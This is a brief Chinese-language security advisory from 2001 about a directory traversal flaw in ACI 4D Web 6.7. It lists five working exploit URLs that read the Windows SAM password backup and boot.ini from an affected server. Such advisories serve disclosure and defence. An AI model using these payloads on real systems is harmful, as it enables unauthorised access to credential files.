ACI 4D Web 存在目录遍历漏洞发布时间:2001-09-14 更新时间:2001-09-14 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 4D version 6.7详细描述 4D(http://www.4d.com/)是WEB应用程序,其中存在漏洞可以导致攻击者获得系统任意文件。 测试代码 http://host/4DBin/_/C:/winnt/repair/sam._ http://host/4DBin/_/../winnt/repair/sam._ http://host/4DBin/_/C:/inetpub/../boot.ini http://host/4DBin/_/../boot.ini http://host/4DBin/_/../inetpub/../boot.ini 解决方案 KRFinisterre at checkfree.com 相关信息 |
